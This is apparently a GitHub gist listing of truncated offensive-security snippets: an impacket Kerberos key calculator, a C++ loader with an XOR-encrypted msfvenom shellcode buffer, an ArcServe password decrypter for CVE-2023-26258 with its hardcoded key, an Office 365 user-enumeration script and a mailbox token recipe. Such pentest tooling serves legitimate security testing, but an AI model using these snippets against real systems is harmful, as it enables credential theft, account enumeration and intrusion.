Superseded by github.com/dadevel/impacket-zsh-integration.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from argparse import ArgumentParser | |
from binascii import unhexlify, hexlify | |
import json | |
from impacket.krb5.constants import EncryptionTypes | |
from impacket.krb5.crypto import string_to_key | |
# source: https://snovvcrash.rocks/2021/05/21/calculating-kerberos-keys.html | |
# usage: ./impacket-aeskey.py -d corp.local -c srv01 -p 8bd8406a... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
int main() { | |
HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
if (!file || file == INVALID_HANDLE_VALUE) { | |
return GetLastError(); | |
} | |
CloseHandle(file); | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12 | |
FROM docker.io/library/neo4j:4.4.12 | |
# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json | |
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar | |
# gds version from https://graphdatascience.ninja/versions.json | |
RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar | |
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \ | |
echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */ | |
.ext-sign-in-box { | |
background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg"); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73 | |
# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | Format-Table -AutoSize | |
function Get-LoadedModules { | |
param( | |
[Parameter(Mandatory,ValueFromPipeline)] | |
[System.Diagnostics.Process] | |
$Processes, | |
[Parameter(Mandatory)] | |
[string[]] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp | |
// usage: ./ArcserveDecrypter.exe HEXBLOB | |
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c | |
constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 }; | |
constexpr auto key_len = sizeof(key); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from argparse import ArgumentParser | |
import json | |
import sys | |
import requests | |
# Retrieve an access token via the device code flow: | |
# roadtx auth --tokenfile ~/.cache/azmail.json --resource https://outlook.office.com --client d3590ed6-52b3-4102-aeff-aad2292ab01c --tenant contoso.com --device-code |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import requests | |
import sys | |
# usage: cat ./gathered-emails.txt | ./o365-user-enum.py | tee -a ./valid-emails.txt | |
url = 'https://login.microsoftonline.com/common/GetCredentialType' | |
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5359.178 Safari/537.36 Edg/106.0.1266.51' | |
with requests.session() as session: |
NewerOlder